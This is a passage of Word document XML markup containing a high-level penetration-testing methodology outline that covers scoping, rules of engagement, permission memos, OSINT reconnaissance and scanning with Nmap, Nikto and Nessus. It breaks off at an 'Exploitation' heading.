    </w:p>
    <w:p w:rsidR="006B6927" w:rsidRPr="006B6927" w:rsidRDefault="006B6927" w:rsidP="00B2441C">
      <w:pPr>
        <w:pStyle w:val="Default"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:spacing w:after="90"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006B6927">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
        </w:rPr>
        <w:t>Determine if and how an attacker could exploit vulnerabilities to gain access to the environment</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006B6927" w:rsidRPr="006B6927" w:rsidRDefault="006B6927" w:rsidP="00B2441C">
      <w:pPr>
        <w:pStyle w:val="Default"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:spacing w:after="90"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006B6927">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
        </w:rPr>
        <w:t>Measures effectiveness of implemented controls, giving of view of “where the rubber meets the road” vs what this believed to be in place from policy and architecture documentation</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006B6927" w:rsidRPr="006B6927" w:rsidRDefault="006B6927" w:rsidP="00B2441C">
      <w:pPr>
        <w:pStyle w:val="Default"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:spacing w:after="90"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006B6927">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
        </w:rPr>
        <w:t>Involves exploitation and often allows the tester to move farther into the environment exposing and exploiting additional vulnerabilities only reachable from internal systems.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006B6927" w:rsidRPr="006B6927" w:rsidRDefault="006B6927" w:rsidP="00B2441C">
      <w:pPr>
        <w:pStyle w:val="Default"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:spacing w:after="90"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006B6927">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve">Assist in the configuration of detective and preventative controls </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006B6927" w:rsidRDefault="006B6927" w:rsidP="00B2441C">
      <w:pPr>
        <w:pStyle w:val="Default"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006B6927">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve">Help measure and train monitoring staff to spot attacks and successful </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
        </w:rPr>
        <w:t>compromises</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005E6850" w:rsidRDefault="005E6850" w:rsidP="005E6850">
      <w:pPr>
        <w:pStyle w:val="Default"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0B3A02ED" wp14:editId="3E069EF5">
            <wp:extent cx="5819775" cy="251071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6472" cy="2530856"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="00690854" w:rsidRPr="006B6927" w:rsidRDefault="00690854" w:rsidP="006B6927">
      <w:pPr>
        <w:pStyle w:val="Default"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="000C4CEA" w:rsidRDefault="000C4CEA" w:rsidP="00AC500F">
      <w:pPr>
        <w:pStyle w:val="Default"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="000300B0" w:rsidRDefault="000300B0" w:rsidP="00AC500F">
      <w:pPr>
        <w:pStyle w:val="Default"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Pentest Methodology </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009874C9" w:rsidRPr="00B8087C" w:rsidRDefault="009874C9" w:rsidP="009874C9">
      <w:pPr>
        <w:pStyle w:val="Default"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="12"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009874C9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
        </w:rPr>
        <w:t>Prep or pre-engagement</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009874C9" w:rsidRPr="009874C9" w:rsidRDefault="009874C9" w:rsidP="009874C9">
      <w:pPr>
        <w:pStyle w:val="Default"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="15"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009874C9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
        </w:rPr>
        <w:t>Determine what we will test (</w:t>
      </w:r>
      <w:r w:rsidRPr="009874C9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Scope</w:t>
      </w:r>
      <w:r w:rsidRPr="009874C9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009874C9" w:rsidRPr="009874C9" w:rsidRDefault="009874C9" w:rsidP="009874C9">
      <w:pPr>
        <w:pStyle w:val="Default"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="15"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009874C9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve">Hosts / IPs / Networks </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009874C9" w:rsidRPr="009874C9" w:rsidRDefault="009874C9" w:rsidP="009874C9">
      <w:pPr>
        <w:pStyle w:val="Default"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="15"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009874C9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve">Cloud Services </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009874C9" w:rsidRPr="009874C9" w:rsidRDefault="009874C9" w:rsidP="009874C9">
      <w:pPr>
        <w:pStyle w:val="Default"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="15"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009874C9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
        </w:rPr>
        <w:t>Any other items in scope</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009874C9" w:rsidRPr="009874C9" w:rsidRDefault="009874C9" w:rsidP="009874C9">
      <w:pPr>
        <w:pStyle w:val="Default"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="15"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009874C9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
        </w:rPr>
        <w:t>Determine how it will be tested (</w:t>
      </w:r>
      <w:r w:rsidRPr="009874C9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Rules of Engagement</w:t>
      </w:r>
      <w:r w:rsidRPr="009874C9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009874C9" w:rsidRPr="009874C9" w:rsidRDefault="009874C9" w:rsidP="009874C9">
      <w:pPr>
        <w:pStyle w:val="Default"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="15"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009874C9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve">Allow and Disallowed Tests </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009874C9" w:rsidRPr="009874C9" w:rsidRDefault="009874C9" w:rsidP="009874C9">
      <w:pPr>
        <w:pStyle w:val="Default"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="15"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009874C9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
        </w:rPr>
        <w:t>Client Contacts</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009874C9" w:rsidRPr="009874C9" w:rsidRDefault="009874C9" w:rsidP="009874C9">
      <w:pPr>
        <w:pStyle w:val="Default"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="15"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009874C9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve">Note: Some CISSP Training Material merges the Scope </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve">and RoE into simple the Rules of </w:t>
      </w:r>
      <w:r w:rsidRPr="009874C9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve">Engagement </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009874C9" w:rsidRPr="009874C9" w:rsidRDefault="009874C9" w:rsidP="009874C9">
      <w:pPr>
        <w:pStyle w:val="Default"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="15"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009874C9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
        </w:rPr>
        <w:t>Permission Memo (Approval from the System Owner) AKA Get out of Jail Card)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009874C9" w:rsidRPr="009874C9" w:rsidRDefault="009874C9" w:rsidP="009874C9">
      <w:pPr>
        <w:pStyle w:val="Default"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="15"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009874C9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
        </w:rPr>
        <w:t>Kick-off (Review all of the above)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B8087C" w:rsidRDefault="00B8087C" w:rsidP="00B8087C">
      <w:pPr>
        <w:pStyle w:val="Default"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00077055" w:rsidRDefault="00077055" w:rsidP="00B8087C">
      <w:pPr>
        <w:pStyle w:val="Default"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00B8087C" w:rsidRPr="00B8087C" w:rsidRDefault="00B8087C" w:rsidP="00B8087C">
      <w:pPr>
        <w:pStyle w:val="Default"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="12"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B8087C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:bCs/>
        </w:rPr>
        <w:t>Reconnaissance</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B8087C" w:rsidRPr="00B8087C" w:rsidRDefault="00B8087C" w:rsidP="00B8087C">
      <w:pPr>
        <w:pStyle w:val="Default"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="16"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B8087C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve">Gather as much Open Source Intelligence (OSINT) about the target organization and technology as possible, sources include: </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B8087C" w:rsidRPr="00B8087C" w:rsidRDefault="00B8087C" w:rsidP="00B8087C">
      <w:pPr>
        <w:pStyle w:val="Default"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="17"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B8087C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
        </w:rPr>
        <w:t>Social Media</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B8087C" w:rsidRPr="00B8087C" w:rsidRDefault="00B8087C" w:rsidP="00B8087C">
      <w:pPr>
        <w:pStyle w:val="Default"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="17"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B8087C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
        </w:rPr>
        <w:t>Blog Posts</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B8087C" w:rsidRPr="00B8087C" w:rsidRDefault="00B8087C" w:rsidP="00B8087C">
      <w:pPr>
        <w:pStyle w:val="Default"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="17"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B8087C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
        </w:rPr>
        <w:t>Job Ads (Often one of the most useful to identify technology)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B8087C" w:rsidRDefault="00B8087C" w:rsidP="00B8087C">
      <w:pPr>
        <w:pStyle w:val="Default"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="18"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B8087C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve">Past Assessment Reports </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B8087C" w:rsidRPr="00B8087C" w:rsidRDefault="00B8087C" w:rsidP="00B8087C">
      <w:pPr>
        <w:pStyle w:val="Default"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="18"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B8087C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
        </w:rPr>
        <w:t>Provided System Documentation (if any)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009874C9" w:rsidRPr="00B8087C" w:rsidRDefault="009874C9" w:rsidP="00B8087C">
      <w:pPr>
        <w:pStyle w:val="Default"/>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00B8087C" w:rsidRDefault="00B8087C" w:rsidP="00B8087C">
      <w:pPr>
        <w:pStyle w:val="Default"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00B8087C" w:rsidRPr="000B652A" w:rsidRDefault="00B8087C" w:rsidP="000B652A">
      <w:pPr>
        <w:pStyle w:val="Default"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="12"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000B652A">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:bCs/>
        </w:rPr>
        <w:t>Scanning and Analysis</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B8087C" w:rsidRPr="00B8087C" w:rsidRDefault="00B8087C" w:rsidP="000B652A">
      <w:pPr>
        <w:pStyle w:val="Default"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="19"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B8087C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve">Identify active hosts with the environment </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B8087C" w:rsidRPr="00B8087C" w:rsidRDefault="00B8087C" w:rsidP="000B652A">
      <w:pPr>
        <w:pStyle w:val="Default"/>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B8087C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Can be provided, discovered through OSINT, detected through p</w:t>
      </w:r>
      <w:r w:rsidR="000B652A">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve">assive means </w:t>
      </w:r>
      <w:r w:rsidRPr="00B8087C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
        </w:rPr>
        <w:t>(interception of broadcasts) or through active means (p</w:t>
      </w:r>
      <w:r w:rsidR="000B652A">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve">ing / service sweeps, dns brute </w:t>
      </w:r>
      <w:r w:rsidRPr="00B8087C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve">force) </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B8087C" w:rsidRPr="00B8087C" w:rsidRDefault="00B8087C" w:rsidP="000B652A">
      <w:pPr>
        <w:pStyle w:val="Default"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="19"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B8087C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve">Service Scanning of active hosts </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B8087C" w:rsidRPr="00B8087C" w:rsidRDefault="00B8087C" w:rsidP="000B652A">
      <w:pPr>
        <w:pStyle w:val="Default"/>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B8087C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
        </w:rPr>
        <w:t>Identify and attempt to fingerprint service type version on active hosts</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B8087C" w:rsidRPr="00B8087C" w:rsidRDefault="00B8087C" w:rsidP="000B652A">
      <w:pPr>
        <w:pStyle w:val="Default"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="20"/>
        </w:numPr>
        <w:spacing w:after="150"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B8087C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
        </w:rPr>
        <w:t>Nmap (service enumeration of in-scope hosts)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B8087C" w:rsidRPr="00B8087C" w:rsidRDefault="00B8087C" w:rsidP="000B652A">
      <w:pPr>
        <w:pStyle w:val="Default"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="20"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B8087C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve">Niktofor targeted assessment of web servers </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B8087C" w:rsidRPr="00B8087C" w:rsidRDefault="00B8087C" w:rsidP="000B652A">
      <w:pPr>
        <w:pStyle w:val="Default"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="21"/>
        </w:numPr>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B8087C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve">Active Vulnerability scan of in-scope hosts and services </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B8087C" w:rsidRPr="00B8087C" w:rsidRDefault="00B8087C" w:rsidP="000B652A">
      <w:pPr>
        <w:pStyle w:val="Default"/>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B8087C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
        </w:rPr>
        <w:t>A tool such as Nessus will perform all three steps</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B8087C" w:rsidRDefault="00B8087C" w:rsidP="000B652A">
      <w:pPr>
        <w:pStyle w:val="Default"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="21"/>
        </w:numPr>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B8087C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve">Analyze discovered attack surface </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000B652A" w:rsidRDefault="000B652A" w:rsidP="000B652A">
      <w:pPr>
        <w:pStyle w:val="Default"/>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="000B652A" w:rsidRDefault="000B652A" w:rsidP="000B652A">
      <w:pPr>
        <w:pStyle w:val="Default"/>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="000B652A" w:rsidRDefault="000B652A" w:rsidP="000B652A">
      <w:pPr>
        <w:pStyle w:val="Default"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="12"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
        </w:rPr>
        <w:t>Exploitation</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000B652A" w:rsidRPr="000B652A" w:rsidRDefault="000B652A" w:rsidP="00CB22F5">
      <w:pPr>
        <w:pStyle w:val="Default"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="22"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000B652A">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
